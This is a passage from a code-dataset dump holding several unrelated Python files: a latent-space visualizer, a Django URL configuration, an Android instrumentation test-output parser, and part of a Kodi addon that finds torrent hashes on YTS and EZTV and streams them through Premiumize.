plotly.express as px\nimport scipy\nfrom matplotlib import style\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom scipy.sparse import csgraph\nfrom sklearn import neighbors\nfrom sklearn.neighbors import radius_neighbors_graph\n\n# plt.switch_backend(\"TkAgg\")\n\n\nnp.set_printoptions(\n suppress=True, precision=3,\n)\nstyle.use(\"ggplot\")\n\n\ndef DisplayLatentDynamics(latent):\n \"\"\"Visualize the dynamics of combination of latents \n Args:\n latent(tensor): Each point in the list is latent's state at the end of a sequence of each batch.\n Latent shape (batch_size, latent_dim)\n Return: Relative plots of latent unit activations\n Usage:\n ======\n DisplayLatentDynamics(latent)\n \"\"\"\n\n latents = {}\n latents.fromkeys(list(range(latent.shape[1])))\n for i in range(latent.shape[1]):\n latents[f\"{i}\"] = latent[:, i].cpu().detach().numpy()\n fig = 
px.scatter_matrix(latents)\n fig.update_layout(\n autosize=False, width=1600, height=1000,\n )\n return fig.show()\n\n\nclass DirectedNetwork(object):\n def __init__(self):\n super().__init__()\n pass\n\n def show(self, states, weight, fig):\n \"\"\"\n\n :param states: list - Hidden states\n :param weight: numpy.ndarray - Array of connection weights\n :param fig: Figure number\n\n :return: boolean: Figure close status : Open - False/ Close - True\n\n \"\"\"\n np.random.seed(70001)\n # Set up hidden states\n state_dict = {i: states[i] for i in range(0, len(states))}\n\n # Set up links\n self_connections = [weight[i][i] for i in range(len(weight))]\n\n # Intialize graph\n G = nx.from_numpy_matrix(\n weight, create_using=nx.MultiDiGraph, parallel_edges=True\n )\n\n edge_colors = weight.tolist()\n edge_colors_ = [float(\"%.8f\" % j) for i in edge_colors for j in i]\n\n # Set up nodes\n neuron_color = [state_dict.get(node, 0.25) for node in G.nodes()]\n\n # Set colrmap\n vmin = np.min(states)\n vmax = np.max(states)\n cmap = plt.cm.coolwarm\n edge_cmap = plt.cm.Spectral\n nx.draw(\n G,\n with_labels=True,\n cmap=cmap,\n node_color=neuron_color,\n node_size=200,\n linewidths=5,\n edge_color=edge_colors_,\n edge_cmap=edge_cmap,\n font_size=10,\n connectionstyle=\"arc3, rad=0.3\",\n )\n\n sm = plt.cm.ScalarMappable(cmap=cmap, norm=plt.Normalize(vmin=vmin, vmax=vmax))\n sm.set_array([])\n cbar = plt.colorbar(sm, orientation=\"vertical\", pad=0.1)\n\n # State of streaming plot\n if plt.fignum_exists(fig.number):\n fig.canvas.draw()\n fig.canvas.flush_events()\n fig.clear()\n\n # Plot is not closed\n return False\n else:\n return True\n\n\nclass LocalLinearEmbedding(object):\n def __init__(self):\n super(LocalLinearEmbedding, self).__init__()\n pass\n\n def local_linear_embedding(self, X, d, k, alpha=0.1):\n \"\"\"\n Local Linear Embeddings\n\n :param X: numpy.ndarray - input data matrix mxD , m data points with D dimensions\n :param d: int - target dimensions\n :param k: int -number of neighbors\n :param alpha: float - Tikhonov coefficient regularization\n\n :return Y: numpy.ndarray - matrix m row, d attributes are reduced dimensional\n \"\"\"\n # Find the nearest neighbor\n x_neighbors = neighbors.kneighbors_graph(X, n_neighbors=k)\n\n m = len(X)\n\n # Init weights\n W = np.zeros(shape=(m, m))\n\n for i, nbor_row in enumerate(x_neighbors):\n # Get the kneighboring indexes of i\n k_indices = nbor_row.indices\n\n # Calculate the Z matrix\n Z_i = X[k_indices] - X[i]\n\n # Calculate the matrix G\n G_i = Z_i @ Z_i.T\n\n # Weights between neigbors\n w_i = scipy.linalg.pinv(G_i + alpha * np.eye(k)) @ np.ones(k)\n W[i, k_indices] = w_i / w_i.sum()\n\n # Calculate matrix M\n M = (np.eye(m) - W).T @ (np.eye(m) - W)\n M = M.T\n\n # Calculate Eigen vectors\n _, vectors = scipy.linalg.eigh(M, eigvals=(0, d))\n\n # Return the vectors and discard the first column of the matrix\n return vectors[:, 1:]\n\n def show(self, pc, fig2):\n \"\"\"[summary]\n\n Args:\n pc ([type]): [description]\n fig2 ([type]): [description]\n \"\"\"\n\n ax = Axes3D(fig2)\n f = ax.scatter(pc[:, 0], pc[:, 1], pc[:, 2], s=40, c=pc[:, 2])\n for i in range(len(pc)):\n ax.plot3D(\n pc[i:, 0],\n pc[i:, 1],\n pc[i:, 2],\n alpha=i / len(pc),\n color=\"red\",\n linewidth=1,\n )\n fig2.colorbar(f)\n # plt.pause(0.0001)\n # State of streaming plot\n if plt.fignum_exists(fig2.number):\n fig2.canvas.draw()\n fig2.canvas.flush_events()\n fig2.clear()\n\n # Plot is not closed\n return False\n else:\n return True\n\n\nclass SpectralEmbedding(object):\n 
class SpectralEmbedding(object):\n def __init__(self):\n super(SpectralEmbedding, self).__init__()\n pass\n\n def spectral_embedding(self, X, rad):\n \"\"\"\n Spectral Clustering\n\n :param X: numpy.ndarray - input data matrix m x n, m data points with n dimensions\n :param rad: float - radius for neighbor search\n\n :return Y: numpy.ndarray - binary partition labels, one per data point\n \"\"\"\n # Get the adjacency matrix/nearest neighbor graph; neighbors within the given radius\n A = radius_neighbors_graph(\n X.T,\n rad,\n mode=\"distance\",\n metric=\"minkowski\",\n p=2,\n metric_params=None,\n include_self=False,\n )\n A = A.toarray()\n\n # Find the Laplacian of the neighbour graph\n # L = D - A ; where D is the diagonal degree matrix\n L = csgraph.laplacian(A, normed=False)\n # Embed the data points in low dimension using the eigenvalues/eigenvectors\n # of the graph Laplacian to get the most optimal partition of the graph\n eigval, eigvec = np.linalg.eig(L)\n # the second smallest eigenvalue represents the sparsest cut of the graph.\n np.where(eigval == np.partition(eigval, 1)[1])\n # Partition the graph using the eigenvector of the second smallest eigenvalue\n y_spec = eigvec[:, 1].copy()\n y_spec[y_spec < 0] = 0\n y_spec[y_spec > 0] = 1\n return y_spec\n\n def show(self, X, spec_embed, fig3):\n \"\"\"[summary]\n\n Args:\n X ([type]): [description]\n spec_embed ([type]): [description]\n fig3 ([type]): [description]\n\n Returns:\n [type]: [description]\n \"\"\"\n\n ax3 = fig3.add_subplot()\n X = X.T\n fi = ax3.scatter(x=X[:, 0], y=X[:, 1], c=spec_embed, s=30, cmap=plt.cm.Spectral)\n for i in range(len(X[:, 0])):\n ax3.annotate(i, (X[:, 0][i], X[:, 1][i]))\n fig3.colorbar(fi)\n\n # State of streaming plot\n if plt.fignum_exists(fig3.number):\n fig3.canvas.draw()\n fig3.canvas.flush_events()\n fig3.clear()\n\n # Plot is not closed\n return False\n else:\n return True\n\n\nif __name__ == \"__main__\":\n # create the coordinates\n number_of_points = 21\n small_range = -1.0\n large_range = 1.0\n\n xcoordinates = np.linspace(small_range, large_range, num=number_of_points)\n ycoordinates = np.linspace(small_range, large_range, num=number_of_points)\n\n xcoord_mesh, ycoord_mesh = np.meshgrid(xcoordinates, ycoordinates)\n inds = np.array(range(number_of_points ** 2))\n s1 = xcoord_mesh.ravel()[inds]\n s2 = ycoord_mesh.ravel()[inds]\n coordinate = np.c_[s1, s2]\n print(\n \"From \",\n small_range,\n \" to \",\n large_range,\n \" with \",\n number_of_points,\n \" total number of coordinates: \",\n number_of_points ** 2,\n )\n\n\nclass Network:\n def __init__(self, activity, weights):\n pass\n\n def show(self):\n fig = None\n return fig\n\n\nclass ShowManifold:\n def __init__(self, inputs, manifold):\n pass\n\n def show(self):\n fig = None\n return fig\n","sub_path":"traja/models/visualizer.py","file_name":"visualizer.py","file_ext":"py","file_size_in_byte":8609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"115417043","text":"\"\"\"faculty URL Configuration\"\"\"\r\nfrom django.urls import path\r\nfrom . 
import views\r\nurlpatterns = [\r\n path('',views.faculty,name='faculty'),\r\n path('flogin',views.flogin,name='flogin'),\r\n path('home',views.home,name='home'),\r\n path('logout',views.logout,name='logout'),\r\n path('account',views.account,name='account'),\r\n path('create_account',views.create_account,name='create_account'),\r\n path('marks',views.marks,name='marks'),\r\n path('chk_marks',views.chk_marks,name='chk_marks'),\r\n path('updated_marks',views.updated_marks,name='updated_marks'),\r\n]\r\n","sub_path":"faculty/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"596465150","text":"import logging\n\nfrom abc import abstractmethod, ABC\nfrom typing import List, Optional, Any\n\nfrom .reporting import TestRunListener\nfrom .timing import StopWatch\n\nlog = logging.getLogger(__name__)\nlog.setLevel(logging.INFO)\n\n\nclass LineParser(ABC):\n \"\"\"\n Basic line-by-line parser interface\n \"\"\"\n\n @abstractmethod\n def parse_line(self, line: str) -> None:\n \"\"\"\n Parse the given line\n :param line: text of line to parse\n :return:\n \"\"\"\n\n\nclass InstrumentationOutputParser(LineParser):\n \"\"\"\n Inspired by:\n https://android.googlesource.com/platform/tools/base/+/master/ddmlib/src/main/java/com/android/ddmlib/testrunner/InstrumentationResultParser.java\n\n Parses the 'raw output mode' results of an instrumentation test run from shell and informs a\n TestRunListener of the results.\n\n Expects the following output:\n\n If fatal error occurred when attempting to run the tests:\n\n .. code-block:: bash\n\n INSTRUMENTATION_STATUS: Error=error Message\n INSTRUMENTATION_FAILED:\n\n or\n\n .. code-block:: bash\n\n INSTRUMENTATION_RESULT: shortMsg=error Message\n\n Otherwise, expect a series of test results, each one containing a set of status key/value\n pairs, delimited by a start(1)/pass(0)/fail(-2)/error(-1) status code result. At end of test\n run, expects that the elapsed test time in seconds will be displayed\n\n For example:\n\n .. 
code-block:: bash\n\n INSTRUMENTATION_STATUS: id=...TestRunner\n INSTRUMENTATION_STATUS: class=com.foo.FooTest\n INSTRUMENTATION_STATUS: test=testFoo\n INSTRUMENTATION_STATUS: numtests=2\n INSTRUMENTATION_STATUS: stack=com.foo.FooTest#testFoo:312\n com.foo.X\n INSTRUMENTATION_STATUS_CODE: -2\n ...\n\n Time: X\n\n Note that the \"value\" portion of the key-value pair may wrap over several text lines\n \"\"\"\n CODE_START = 1\n CODE_IN_PROGRESS = 2\n CODE_PASS = 0\n CODE_ERROR = -1\n CODE_FAIL = -2\n CODE_SKIPPED = -3\n # if a junit assumption-failure-exception is raised, it means test should be counted as skipped; code for this is\n # -4:\n CODE_ASSUMPTION_VIOLATION = -4\n\n # line control prefix\n PREFIX_STATUS = \"INSTRUMENTATION_STATUS: \"\n PREFIX_STATUS_CODE = \"INSTRUMENTATION_STATUS_CODE: \"\n PREFIX_FAILED = \"INSTRUMENTATION_FAILED: \"\n PREFIX_CODE = \"INSTRUMENTATION_CODE: \"\n PREFIX_RESULT = \"INSTRUMENTATION_RESULT: \"\n PREFIX_TIME = \"Time: \"\n\n FAILURE_MSG = \"FAILURES!!!\"\n\n # instrumentation status keys\n KEY_TEST = \"test\"\n KEY_CLASS = \"class\"\n KEY_STACK = \"stack\"\n KEY_STREAM = \"stream\"\n KEY_NUM_TESTS = \"numtests\"\n KEY_ERROR = \"Error\"\n KEY_SHORT_MSG = \"shortMsg\"\n # unused keys\n KEY_ID = \"id\"\n KEY_CURRENT = \"current\"\n\n KNOWN_KEYS = {\n KEY_TEST,\n KEY_CLASS,\n KEY_STACK,\n KEY_STREAM,\n KEY_NUM_TESTS,\n KEY_ERROR,\n KEY_SHORT_MSG,\n KEY_ID,\n KEY_CURRENT\n }\n\n UNKNOWN_TEST_CLASS = \"<>\"\n UNKNOWN_TEST_NAME = \"<>\"\n MISSING_STACK_TRACE = \"<>\"\n\n class TestParsingResult:\n \"\"\"Holds information about current test while parsing\"\"\"\n def __init__(self) -> None:\n self.code: Optional[int] = None\n self.test_name: Optional[str] = None\n self.test_class: Optional[str] = None\n self.num_tests: Optional[int] = None\n self.stack_trace: Optional[str] = None\n self.stream: Optional[str] = None\n\n def is_complete(self) -> bool:\n return (self.code is not None\n and self.test_name is not None\n and self.test_class is not None)\n\n def __repr__(self) -> str:\n return self.__class__.__name__ + str(self.__dict__)\n\n def __init__(self, test_run_listener: Optional[TestRunListener] = None,\n include_instrumentation_output: bool = False) -> None:\n super().__init__()\n self._reporters: List[TestRunListener] = [test_run_listener] if test_run_listener else []\n self._execution_listeners: List[StopWatch] = []\n self._current_test: Optional[InstrumentationOutputParser.TestParsingResult] = None\n self._last_test: Optional[InstrumentationOutputParser.TestParsingResult] = None\n self._in_result_key_value: bool = False\n self._current_key: Optional[str] = None\n self._current_value: Optional[List[str]] = None\n\n # either we got INSTRUMENTATION_CODE or INSTRUMENTATION_FAILED signaling end of run\n self._test_run_finished: bool = False\n self._reported_any_results: bool = False\n self._reported_test_run_fail: bool = False\n self._got_failure_msg: bool = False\n\n self._num_tests_expected: int = 0\n self._num_tests_run: int = 0\n\n # todo: currently unused. 
However, android studio reports this as test run duration.\n self._test_run_time: float = 0\n\n self._include_instrumentation_output = include_instrumentation_output\n self._instrumentation_text = \"\"\n\n def __enter__(self) -> \"InstrumentationOutputParser\":\n return self\n\n def __exit__(self, *args: Any) -> None:\n self.close()\n\n @property\n def execution_time(self) -> float:\n return self._test_run_time\n\n @property\n def total_test_count(self) -> int:\n return self._num_tests_run\n\n @property\n def num_tests_expected(self) -> int:\n return self._num_tests_expected\n\n def add_listener(self, listener: TestRunListener) -> None:\n \"\"\"\n Add listener for test start/end as well as test status\n :param listener: listener to add\n \"\"\"\n self._reporters.append(listener)\n\n def add_test_execution_listener(self, listener: StopWatch) -> None:\n \"\"\"\n add an agent for this parser to use to mark the start and end of tests\n without need to listen for test status\n \"\"\"\n self._execution_listeners.append(listener)\n\n def parse_line(self, line: str) -> None:\n \"\"\"\n Entry point. Parses one line of output at a time.\n :param line: A single line of output (typically ending in '\\n', unless the end of output has been reached)\n \"\"\"\n if self._include_instrumentation_output:\n self._instrumentation_text += line + \"\\n\"\n if line.startswith(self.PREFIX_STATUS_CODE):\n self._finalize_current_key_value()\n self._in_result_key_value = False\n self._parse_status_code(line[len(self.PREFIX_STATUS_CODE):])\n elif line.startswith(self.PREFIX_STATUS):\n self._finalize_current_key_value()\n self._in_result_key_value = False\n self._parse_key_value(line[len(self.PREFIX_STATUS):])\n elif line.startswith(self.PREFIX_RESULT):\n self._finalize_current_key_value()\n self._in_result_key_value = True\n self._parse_key_value(line[len(self.PREFIX_RESULT):])\n elif line.startswith(self.PREFIX_FAILED) \\\n or line.startswith(self.PREFIX_CODE):\n self._finalize_current_key_value()\n self._in_result_key_value = False\n # at close() we'll report the error\n self._test_run_finished = True\n elif line.startswith(self.PREFIX_TIME):\n self._parse_time(line[len(self.PREFIX_TIME):])\n else:\n # Handles the case where the instrumentation output itself fails. 
In that case it only outputs:\n # INSTRUMENTATION_RESULT: stream=...\n # ...\n # FAILURES!!!\n # Tests run: 0, Failures: x\n # INSTRUMENTATION_CODE: -1\n if not self._got_failure_msg and line.startswith(self.FAILURE_MSG):\n self._got_failure_msg = True\n # continuation of value from previous status\n if self._current_value is not None:\n self._current_value.append(line)\n elif line.strip():\n log.debug(\"Unrecognized line: %s\", line)\n\n
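 # --- Usage sketch (added illustration, not part of the original file): feed raw\n # --- \"am instrument -r\" output to the parser line by line, then close it.\n # parser = InstrumentationOutputParser(listener) # 'listener' implements TestRunListener\n # for output_line in instrument_output: # hypothetical iterable of output lines\n # parser.parse_line(output_line)\n # parser.close()\n\n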
 def _parse_status_code(self, line: str) -> None:\n \"\"\"\n Parses content of line after \"INSTRUMENTATION_STATUS_CODE: \"\n \"\"\"\n test = self._get_current_test()\n test_class = test.test_class or self.UNKNOWN_TEST_CLASS\n test_name = test.test_name or self.UNKNOWN_TEST_NAME\n try:\n test.code = int(line.strip())\n except ValueError:\n log.warning(\"Expected int status code, received: %s\", line)\n test.code = self.CODE_ERROR\n\n if test.code != self.CODE_IN_PROGRESS:\n # end of test result bundle -- either test starting or ending\n self._report_result(test)\n self._last_test = self._current_test\n self._current_test = None\n if test.code == self.CODE_START:\n # mark start of next test\n for listener in self._execution_listeners:\n listener.mark_start(\".\".join([test_class, test_name]))\n else:\n # terminal status code: mark end of the test\n for listener in self._execution_listeners:\n listener.mark_end(\".\".join([test_class, test_name]))\n\n def _parse_key_value(self, line: str) -> None:\n \"\"\"\n Parses line format key=value (after \"INSTRUMENTATION_STATUS: \" or \"INSTRUMENTATION_RESULT: \")\n \"\"\"\n key_val = line.split('=', 1)\n if len(key_val) == 2:\n self._current_key = key_val[0].strip()\n self._current_value = [key_val[1]]\n else:\n log.warning(\"Expected key=value, got: %s\", line)\n\n def _parse_time(self, line: str) -> None:\n \"\"\"\n Parses content of line after \"Time: \"\n \"\"\"\n try:\n self._test_run_time = float(line)\n except ValueError:\n log.warning(\"Unexpected time format: %s\", line)\n\n def _get_current_test(self) -> TestParsingResult: # noqa: https://github.com/PyCQA/pyflakes/issues/427\n \"\"\"\n :return: TestParsingResult for the currently running test, creating one if none exists\n \"\"\"\n current_test = self._current_test or self.TestParsingResult()\n if not self._current_test:\n self._current_test = current_test\n return current_test\n\n def _finalize_current_key_value(self) -> None:\n \"\"\"\n For key-value lines, the value may consist of multiple lines of output. When we see a key=value line, all\n following lines will be added to the value until we see another known prefix. Once we hit a known prefix, this\n method is called to finalize the value and do some action according to the key: report a test result, record\n some property of the test, etc.\n \"\"\"\n if self._current_key is not None and self._current_value is not None:\n value = ''.join(self._current_value)\n\n if self._in_result_key_value:\n if self._current_key not in self.KNOWN_KEYS:\n # todo: bundle key values?\n pass\n elif self._current_key == self.KEY_SHORT_MSG:\n # todo: collect more info? long_msg?\n self._report_test_run_failed(\"Instrumentation run failed due to '%s'\" % value)\n else:\n test = self._get_current_test()\n\n if self._current_key == self.KEY_CLASS:\n test.test_class = value.strip()\n elif self._current_key == self.KEY_TEST:\n test.test_name = value.strip()\n elif self._current_key == self.KEY_NUM_TESTS:\n try:\n test.num_tests = int(value.strip())\n except ValueError:\n log.warning(\"Unexpected number of tests, received: %s\", value)\n elif self._current_key == self.KEY_ERROR:\n self._report_test_run_failed(value)\n elif self._current_key == self.KEY_STACK:\n test.stack_trace = '\\n'.join(self._current_value)\n elif self._current_key == self.KEY_STREAM:\n test.stream = value\n elif self._current_key not in self.KNOWN_KEYS:\n # todo: test metrics?\n pass\n\n self._current_key = None\n self._current_value = None\n\n def _report_result(self, test: TestParsingResult) -> None:\n \"\"\"\n Reports the given TestParsingResult to the TestRunListener (test starting or test ending).\n :param test: the TestParsingResult that should be reported\n \"\"\"\n if not test.is_complete():\n log.warning(\"Invalid instrumentation status bundle: %s\", test)\n return\n\n if not self._reported_any_results and test.num_tests is not None:\n self._num_tests_expected = test.num_tests\n self._reported_any_results = True\n\n test_class = test.test_class or self.UNKNOWN_TEST_CLASS\n test_name = test.test_name or self.UNKNOWN_TEST_NAME\n\n if test.code == self.CODE_START:\n for reporter in self._reporters:\n reporter.test_started(test_class, test_name)\n return\n\n self._num_tests_run += 1\n if test.code == self.CODE_FAIL or test.code == self.CODE_ERROR:\n for reporter in self._reporters:\n reporter.test_failed(test_class, test_name, test.stack_trace or self.MISSING_STACK_TRACE)\n else:\n if test.code == self.CODE_SKIPPED:\n for reporter in self._reporters:\n reporter.test_started(test_class, test_name)\n reporter.test_ignored(test_class, test_name)\n elif test.code == self.CODE_ASSUMPTION_VIOLATION:\n for reporter in self._reporters:\n reporter.test_assumption_failure(test_class, test_name, test.stack_trace or self.MISSING_STACK_TRACE)\n elif test.code != self.CODE_PASS:\n log.warning(\"Unknown status code %s. Stacktrace: %s\", test.code, test.stack_trace)\n for reporter in self._reporters:\n reporter.test_ended(test_class, test_name, instrumentation_output=self._instrumentation_text)\n self._instrumentation_text = \"\"\n\n def _report_test_run_failed(self, error_message: str) -> None:\n \"\"\"\n Reports a test run failure to the TestRunListener\n :param error_message: The error message to report\n \"\"\"\n log.info(\"Test run failed: %s\", error_message)\n if self._last_test and self._last_test.is_complete() and self._last_test.code == self.CODE_START:\n test_class = self._last_test.test_class or self.UNKNOWN_TEST_CLASS\n test_name = self._last_test.test_name or self.UNKNOWN_TEST_NAME\n # got test start but not test stop - assume that test caused this and report as test failure\n # todo: get logs here?\n stack_trace = \"Test failed to run to completion. 
Reason: '%s'.\" \\\n \" Check device logcat for details.\" % error_message\n for reporter in self._reporters:\n reporter.test_failed(test_class, test_name, stack_trace)\n reporter.test_ended(test_class, test_name, instrumentation_output=self._instrumentation_text)\n self._instrumentation_text = \"\"\n\n for reporter in self._reporters:\n reporter.test_run_failed(error_message)\n self._reported_any_results = True\n self._reported_test_run_fail = True\n\n def close(self) -> None:\n \"\"\"\n Ensures that all expected tests have been run, or else fails the test run.\n \"\"\"\n if self._reported_test_run_fail:\n return\n if not self._reported_any_results and (not self._test_run_finished or self._got_failure_msg):\n self._report_test_run_failed(\"No test results, instrumentation may have failed\")\n elif self._num_tests_run < self._num_tests_expected:\n self._report_test_run_failed(\n \"Test run failed to complete.\"\n \" Expected %s tests, received %s\" % (self._num_tests_expected, self._num_tests_run))\n","sub_path":"orchestrator/src/androidtestorchestrator/parsing.py","file_name":"parsing.py","file_ext":"py","file_size_in_byte":16195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"628429810","text":"\"\"\"\n SALTS XBMC Addon\n Copyright (C) 2014 tknorris\n\n This program is free software: you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation, either version 3 of the License, or\n (at your option) any later version.\n\n This program is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU General Public License for more details.\n\n You should have received a copy of the GNU General Public License\n along with this program. If not, see .\n\"\"\"\nimport re\nimport urllib\nimport urlparse\nimport xbmcgui\nfrom salts_lib import kodi\nfrom salts_lib import log_utils\nfrom salts_lib import scraper_utils\nfrom salts_lib import dom_parser\nfrom salts_lib.constants import FORCE_NO_MATCH\nfrom salts_lib.constants import VIDEO_TYPES\nfrom salts_lib.constants import QUALITIES\nfrom salts_lib.kodi import i18n\nimport scraper\n\nBASE_URL = 'premiumize.me'\nCHECKHASH_URL = '/api/torrent/checkhashes?'\nADD_URL = '/api/transfer/create?type=torrent'\nBROWSE_URL = '/api/torrent/browse?hash=%s'\nLIST_URL = '/api/transfer/list'\n\nBASE_UR2 = 'https://yts.ag'\nMOVIE_SEARCH_URL = '/api/v2/list_movies.json?query_term=%s&sort_by=seeders&order_by=desc'\nMOVIE_DETAILS_URL = '/api/v2/movie_details.json?movie_id=%s'\n\nBASE_URL3 = 'https://eztv.ag'\n\nMAGNET_LINK = 'magnet:?xt=urn:btih:%s'\nVIDEO_EXT = ['MKV', 'AVI', 'MP4']\nQUALITY_MAP = {'1080p': QUALITIES.HD1080, '720p': QUALITIES.HD720, '3D': QUALITIES.HD1080}\n\nclass Premiumize_Scraper(scraper.Scraper):\n base_url = BASE_URL\n movie_base_url = BASE_UR2\n tv_base_url = BASE_URL3\n\n def __init__(self, timeout=scraper.DEFAULT_TIMEOUT):\n self.timeout = timeout\n if kodi.get_setting('%s-use_https' % (self.get_name())) == 'true':\n scheme = 'https'\n prefix = 'www'\n else:\n scheme = 'http'\n prefix = 'http'\n base_url = kodi.get_setting('%s-base_url' % (self.get_name()))\n self.base_url = scheme + '://' + prefix + '.' 
+ base_url\n self.movie_base_url = kodi.get_setting('%s-base_url2' % (self.get_name()))\n self.tv_base_url = kodi.get_setting('%s-base_url3' % (self.get_name()))\n self.username = kodi.get_setting('%s-username' % (self.get_name()))\n self.password = kodi.get_setting('%s-password' % (self.get_name()))\n\n @classmethod\n def provides(cls):\n return frozenset([VIDEO_TYPES.MOVIE, VIDEO_TYPES.TVSHOW, VIDEO_TYPES.EPISODE])\n\n @classmethod\n def get_name(cls):\n return 'Premiumize.me'\n\n def resolve_link(self, link):\n query = urlparse.parse_qs(link)\n if 'hash_id' in query:\n hash_id = query['hash_id'][0].lower()\n if self.__add_torrent(hash_id):\n browse_url = BROWSE_URL % (hash_id)\n browse_url = urlparse.urljoin(self.base_url, browse_url)\n js_data = self._json_get(browse_url, cache_limit=0)\n if 'content' in js_data:\n videos = self.__get_videos(js_data['content'])\n \n if len(videos) > 1:\n result = xbmcgui.Dialog().select(i18n('choose_stream'), [video['label'] for video in videos])\n if result > -1:\n return videos[result]['url']\n elif videos:\n return videos[0]['url']\n \n def __add_torrent(self, hash_id):\n list_url = urlparse.urljoin(self.base_url, LIST_URL)\n js_data = self._json_get(list_url, cache_limit=0)\n if 'transfers' in js_data:\n for transfer in js_data['transfers']:\n if transfer['hash'].lower() == hash_id:\n return True\n \n add_url = urlparse.urljoin(self.base_url, ADD_URL)\n data = {'src': MAGNET_LINK % hash_id}\n js_data = self._json_get(add_url, data=data, cache_limit=0)\n if 'status' in js_data and js_data['status'] == 'success':\n return True\n else:\n return False\n \n def __get_videos(self, content):\n videos = []\n for key in content:\n item = content[key]\n if item['type'].lower() == 'dir':\n videos += self.__get_videos(item['children'])\n else:\n if item['ext'].upper() in VIDEO_EXT:\n label = '(%s) %s' % (scraper_utils.format_size(item['size'], 'B'), item['name'])\n video = {'label': label, 'url': item['url']}\n videos.append(video)\n if 'transcoded' in item and item['transcoded']:\n transcode = item['transcoded']\n if 'size' in transcode:\n label = '(%s) (Transcode) %s' % (scraper_utils.format_size(transcode['size'], 'B'), item['name'])\n else:\n label = '(Transcode) %s' % (item['name'])\n video = {'label': label, 'url': transcode['url']}\n videos.append(video)\n return videos\n\n def format_source_label(self, item):\n label = '[%s] %s' % (item['quality'], item['host'])\n if '3D' in item and item['3D']:\n label += ' (3D)'\n if 'size' in item:\n label += ' (%s)' % (item['size'])\n if 'extra' in item:\n label += ' [%s]' % (item['extra'])\n return label\n\n def get_sources(self, video):\n source_url = self.get_url(video)\n if source_url and source_url != FORCE_NO_MATCH:\n if video.video_type == VIDEO_TYPES.MOVIE:\n return self.__get_movie_sources(source_url)\n else:\n return self.__get_episode_sources(source_url, video)\n \n def __get_episode_sources(self, source_url, video):\n hosters = []\n links = self.__find_episode(source_url, video)\n if links:\n hash_data = self.__get_hash_data([link[0] for link in links])\n for link in links:\n try: status = hash_data['hashes'][link[0]]['status']\n except KeyError: status = ''\n if status.lower() == 'finished':\n stream_url = 'hash_id=%s' % (link[0])\n host = self._get_direct_hostname(stream_url)\n quality = scraper_utils.blog_get_quality(video, link[1], '')\n hoster = {'multi-part': False, 'class': self, 'views': None, 'url': stream_url, 'rating': None, 'host': host, 'quality': quality, 'direct': True}\n hoster['extra'] 
= link[1]\n hosters.append(hoster)\n return hosters\n \n def __get_movie_sources(self, source_url):\n hosters = []\n query = urlparse.parse_qs(urlparse.urlparse(source_url).query)\n if 'movie_id' in query:\n movie_id = query['movie_id']\n else:\n movie_id = self.__get_movie_id(source_url)\n \n if movie_id:\n details_url = MOVIE_DETAILS_URL % (movie_id[0])\n details_url = urlparse.urljoin(self.movie_base_url, details_url)\n detail_data = self._json_get(details_url, cache_limit=24)\n try: torrents = detail_data['data']['movie']['torrents']\n except KeyError: torrents = []\n try: hashes = [torrent['hash'].lower() for torrent in torrents]\n except KeyError: hashes = []\n hash_data = self.__get_hash_data(hashes)\n for torrent in torrents:\n hash_id = torrent['hash'].lower()\n try: status = hash_data['hashes'][hash_id]['status']\n except KeyError: status = ''\n if status.lower() == 'finished':\n stream_url = 'hash_id=%s' % (hash_id)\n host = self._get_direct_hostname(stream_url)\n quality = QUALITY_MAP.get(torrent['quality'], QUALITIES.HD720)\n hoster = {'multi-part': False, 'class': self, 'views': None, 'url': stream_url, 'rating': None, 'host': host, 'quality': quality, 'direct': True}\n if 'size_bytes' in torrent: hoster['size'] = scraper_utils.format_size(torrent['size_bytes'], 'B')\n if torrent['quality'] == '3D': hoster['3D'] = True\n hosters.append(hoster)\n return hosters\n \n def __get_movie_id(self, source_url):\n url = urlparse.urljoin(self.movie_base_url, source_url)\n html = self._http_get(url, cache_limit=24)\n return dom_parser.parse_dom(html, 'div', {'id': 'movie-info'}, ret='data-movie-id')\n\n def __get_hash_data(self, hashes):\n new_data = {}\n if hashes:\n check_url = CHECKHASH_URL + urllib.urlencode([('hashes[]', hashes)], doseq=True)\n check_url = urlparse.urljoin(self.base_url, check_url)\n new_data = hash_data = self._json_get(check_url, cache_limit=.1)\n if 'hashes' in hash_data:\n new_data['hashes'] = dict((hash_id.lower(), hash_data['hashes'][hash_id]) for hash_id in hash_data['hashes'])\n return new_data\n \n def get_url(self, video):\n return self._default_get_url(video)\n\n def _get_episode_url(self, show_url, video):\n result = self.__find_episode(show_url, video)\n if result:\n return show_url\n \n def __find_episode(self, show_url, video):\n url = urlparse.urljoin(self.tv_base_url, show_url)\n html = self._http_get(url, cache_limit=2)\n magnets = dom_parser.parse_dom(html, 'a', {'class': 'magnet'}, ret='href')\n titles = dom_parser.parse_dom(html, 'a', {'class': 'magnet'}, ret='title')\n titles = [re.sub('\\s+[Mm]agnet\\s+[Ll]ink', '', title) for title in titles]\n hashes = []\n for i, magnet in enumerate(magnets):\n match = re.search('urn:btih:(.*?)(?:&|$)', magnet, re.I)\n if match:\n hashes.append((match.group(1), titles[i]))\n \n episode_pattern = 'S%02dE%02d' % (int(video.season), int(video.episode))\n if video.ep_airdate:\n airdate_pattern = '%d(-|.| )%02d(-|.| )%02d' % (video.ep_airdate.year, video.ep_airdate.month, video.ep_airdate.day)\n else:\n airdate_pattern = ''\n \n matches = [link for link in hashes if re.search(episode_pattern, link[1], re.I)]\n if not matches and airdate_pattern:\n matches = [link for link in hashes if re.search(airdate_pattern, link[1])]\n return matches\n\n def search(self, video_type, title, year, season=''):\n if video_type == VIDEO_TYPES.MOVIE:\n return self.__movie_search(title, year)\n else:\n return self.__tv_search(title, year)\n\n def __movie_search(self, title, year):\n results = []\n search_url = MOVIE_SEARCH_URL % 
